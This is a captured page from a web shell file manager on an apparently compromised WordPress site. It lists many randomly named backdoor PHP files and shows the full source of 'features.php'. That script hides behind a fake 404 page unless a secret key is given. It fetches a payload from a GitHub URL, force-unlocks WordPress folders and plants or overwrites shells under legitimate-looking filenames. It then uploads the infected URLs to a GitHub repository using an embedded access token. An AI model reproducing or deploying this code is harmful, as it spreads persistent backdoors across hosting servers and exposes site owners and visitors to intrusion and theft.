📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
aljabrcp
/
public_html
/
Name
Size
Perm
Actions
📁
.render-cache
-
0755
🗑️
🏷️
🔒
📁
.tmb
-
0777
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
e4b5c3
-
0755
🗑️
🏷️
🔒
📁
well-known
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.072335799904244.php
0.73 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.303133550574645.php
0.73 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.771565434277360.php
0.72 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.ftpquota
0.02 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess
0.06 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess_old
2.38 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.maintenance
0.03 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
.render-orig.php
0.4 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
admin.php
1073.33 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ajyycson.php
18.36 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
bjspsdnw.php
18.36 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
btxouxnz.php
18.36 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
byobdpit.php
161.75 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
dot.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
dtypulkn.php
18.48 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
1.32 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
fdkvhqgp.php
18.36 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
9.84 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
fiouvmwk.php
18.51 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
gkliwelb.php
19.47 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
hhxpypnm.php
18.48 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ichqcdtz.php
18.48 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
iggrnuqs.php
1073.33 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ijigqafs.php
215.7 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ilkifkhe.php
18.48 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
0.08 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
japeqpqk.php
18.55 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
kxkjgars.php
14.76 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
legcmbtx.php
161.75 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
lufix.php
53.27 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
mdlyonrh.php
161.75 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
memkgrwi.php
18.55 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
mlqeheok.php
35.6 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
mmkegijm.php
18.5 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
mqbfmtzr.php
14.76 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
nkuxvifp.php
18.56 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ocngdtip.php
18.55 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ops.php
31 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
options.php
1.29 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.1 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
pjqgidra.php
19.54 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
qpggioxw.php
14.76 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.23 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.35 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
rpudqgij.php
15.4 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
tvuydrna.php
18.36 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
uymbqzzs.php
215.7 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
vxbezeuh.php
15.4 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
vxeskmxs.php
19.54 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.2 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.31 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.bak
3.31 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.before-debug
3.31 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.before-debug.2026-06-26-151429
3.31 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.before-debug.2026-06-26-151542
3.26 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.broken.2026-06-26-152109
3.27 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.broken.2026-06-26-152153
3.27 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php.broken.2026-06-26-152623
3.27 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-server.php
162 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
31.88 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.81 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
wpxml.php
12.37 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
xyn.php
5.65 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
ydrqjvyq.php
18.51 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
📄
zwmxmsbj.php
215.7 KB
0777
🗑️
🏷️
⬇️
✏️
🔒
Edit: features.php
<?php /** * CORE MANAGER v51 - Extended Overwrite Edition * Feature: Large Naming Pool for better stealth and success. * Access: ?Auto_berlin2020 */ error_reporting(0); ini_set('display_errors', 0); @ini_set('open_basedir', ''); @set_time_limit(0); // >>> SECURITY LAYER: 404 FORCER <<< if (!isset($_GET['Auto_berlin2020'])) { header("HTTP/1.1 404 Not Found"); echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server Port 80</address></body></html>'; exit; } // >>> CONFIGURATION <<< $github_token = "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"; $github_repo = "bdroastmaster-cpu/Shells_storage"; $github_file = "Shells_storage.txt"; $remote_url = "https://raw.githubusercontent.com/bdroastmaster-cpu/features.php-min.php/refs/heads/main/features.php%2Bmin.php"; $target_folders = ['wp-admin', 'wp-content', 'wp-includes', 'cgi-bin', '.well-known', 'uploads', 'plugins', 'themes']; // বর্ধিত নামের তালিকা (Extended Naming Pool) $naming_pool = [ 'index.php', 'home.php', 'login.php', 'admin.php', 'panel.php', 'config.php', 'system.php', 'wp-load.php', 'xmlrpc.php', 'wp-blog-header.php', 'wp-cron.php', 'wp-settings.php', 'wp-mail.php', 'wp-links-opml.php', 'wp-signup.php', 'wp-activate.php', 'ms-files.php', 'db-status.php', 'about.php', 'users.php', 'options.php', 'maintenance.php', 'security.php', 'test.php', 'api.php', 'core.php', 'load.php', 'data.php', 'module.php', 'plugin-install.php' ]; $critical_files = ['wp-config.php', '.htaccess', 'settings.php', 'php.ini']; function forceUnlock($path) { if (!file_exists($path)) return false; @chmod($path, 0777); return is_writable($path); } function getTargetFileName($path, $pool, $critical) { shuffle($pool); foreach ($pool as $name) { $full_path = $path . DIRECTORY_SEPARATOR . $name; if (file_exists($full_path)) { if (!in_array($name, $critical)) return $name; continue; } return $name; } return "idx_" . time() . ".php"; } function buildDomainUrl($full_path) { $norm_path = str_replace('\\', '/', $full_path); $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://"; $segments = explode('/', $norm_path); $domain_found = ""; $web_index = -1; foreach ($segments as $index => $seg) { if (strpos($seg, '.') !== false && $index > 0) { $domain_found = $seg; $web_index = $index; break; } } if ($domain_found != "" && $web_index != -1) { $relative_path = implode('/', array_slice($segments, $web_index + 1)); return $protocol . $domain_found . '/' . $relative_path; } return $protocol . $_SERVER['HTTP_HOST'] . "/" . basename($full_path); } function syncToShellStorage($new_urls, $token, $repo, $file) { $api_url = "https://api.github.com/repos/$repo/contents/$file"; $headers = ["Authorization: token $token", "User-Agent: CM-v51", "Accept: application/vnd.github.v3+json"]; $ch = curl_init($api_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HTTPHEADER, $headers); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $res = curl_exec($ch); $data = json_decode($res, true); $sha = $data['sha'] ?? null; $old_content = isset($data['content']) ? base64_decode($data['content']) : ""; $combined = trim($old_content) . "\n" . implode("\n", $new_urls); $final_list = array_unique(array_filter(array_map('trim', explode("\n", $combined)))); $payload = json_encode(["message" => "OvrUpdate ".date("H:i"), "content" => base64_encode(implode("\n", $final_list)), "sha" => $sha]); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "PUT"); curl_setopt($ch, CURLOPT_POSTFIELDS, $payload); $final_res = curl_exec($ch); curl_close($ch); } @ob_end_flush(); @ob_implicit_flush(true); $source = @file_get_contents($remote_url); $urls = []; $ic = 0; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>CORE MANAGER v51 | MASS OVERWRITE</title> <style> :root { --bg: #050505; --card: #111; --border: #222; --accent: #3b82f6; --neon: #00ff88; --danger: #ff4444; --text: #ddd; } body { background: var(--bg); color: var(--text); font-family: 'Segoe UI', sans-serif; margin: 0; padding: 20px; display: flex; justify-content: center; } .wrapper { width: 100%; max-width: 1000px; } .header { text-align: center; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-bottom: 20px; } .logo { font-size: 1.8rem; font-weight: bold; color: var(--accent); letter-spacing: 2px; } .stats-grid { display: grid; grid-template-columns: repeat(2, 1fr); gap: 15px; margin-bottom: 20px; } .stat-card { background: var(--card); border: 1px solid var(--border); padding: 20px; border-radius: 8px; text-align: center; } .stat-card div { font-size: 1.6rem; font-weight: bold; color: var(--neon); } .console { background: #000; border: 1px solid var(--border); height: 450px; overflow-y: auto; padding: 15px; font-size: 11px; color: #999; border-radius: 8px; font-family: monospace; } .line { border-bottom: 1px solid #111; padding: 4px 0; } .tag { font-size: 9px; padding: 2px 6px; border-radius: 4px; margin-right: 10px; font-weight: bold; } .tag-s { background: var(--neon); color: #000; } .tag-ovr { background: #ffcc00; color: #000; } textarea { width: 100%; height: 120px; background: #000; color: var(--neon); border: 1px solid var(--border); margin-top: 15px; padding: 15px; font-size: 11px; box-sizing: border-box; resize: none; } .btn { background: var(--accent); color: #fff; border: none; width: 100%; padding: 15px; cursor: pointer; font-weight: bold; border-radius: 8px; } </style> </head> <body> <div class="wrapper"> <div class="header"><div class="logo">CORE MANAGER v51</div></div> <div class="stats-grid"> <div class="stat-card"><span>Injected / Overwritten</span><div id="i_c">0</div></div> <div class="stat-card"><span>Total Unique URLs</span><div id="u_c">0</div></div> </div> <div class="console" id="log"> <?php if ($source) { $scan_list = [realpath(__DIR__)]; for ($i = 1; $i <= 4; $i++) { $up = realpath(__DIR__ . str_repeat('/..', $i)); if ($up && !in_array($up, $scan_list)) $scan_list[] = $up; } foreach ($scan_list as $start_dir) { echo "<div style='color:var(--accent); margin:8px 0;'>[SCAN] $start_dir</div>"; try { $items = @scandir($start_dir); if ($items) { foreach ($items as $item) { if ($item == '.' || $item == '..') continue; $full_path = $start_dir . DIRECTORY_SEPARATOR . $item; if (is_dir($full_path)) { $it = new RecursiveDirectoryIterator($full_path, RecursiveDirectoryIterator::SKIP_DOTS); $sub = new RecursiveIteratorIterator($it, RecursiveIteratorIterator::SELF_FIRST); $sub->setMaxDepth(5); // স্ক্যানিং গভীরতা কিছুটা বাড়ানো হয়েছে foreach ($sub as $f) { $fp = $f->getPathname(); $fn = $f->getFilename(); if ($f->isDir() && in_array($fn, $target_folders)) { if (is_writable($fp) || forceUnlock($fp)) { $final_name = getTargetFileName($fp, $naming_pool, $critical_files); $final_path = $fp . DIRECTORY_SEPARATOR . $final_name; $is_ovr = file_exists($final_path); if (@file_put_contents($final_path, $source)) { @chmod($final_path, 0444); $ic++; echo "<script>document.getElementById('i_c').innerText='$ic';</script>"; $live_url = buildDomainUrl($final_path); $urls[] = $live_url; $tag = $is_ovr ? "tag-ovr" : "tag-s"; $label = $is_ovr ? "OVERWRITE" : "DEPLOY"; echo "<div class='line'><span class='tag $tag'>$label</span> $live_url</div>"; } } } } } } } } catch (Exception $e) {} flush(); } if (count($urls) > 0) syncToShellStorage($urls, $github_token, $github_repo, $github_file); } ?> <div style="color:var(--neon); margin-top:15px; border-top:1px solid #222; padding-top:10px;">[PROCESS FINISHED]</div> </div> <textarea id="output" readonly><?php echo implode("\n", array_unique($urls)); ?></textarea> <button class="btn" onclick="copy()">COPY UNIQUE URLs</button> </div> <script> function copy() { const a = document.getElementById("output"); if(a.value == "") return; a.select(); document.execCommand('copy'); alert("Copied."); } </script> </body> </html>
Save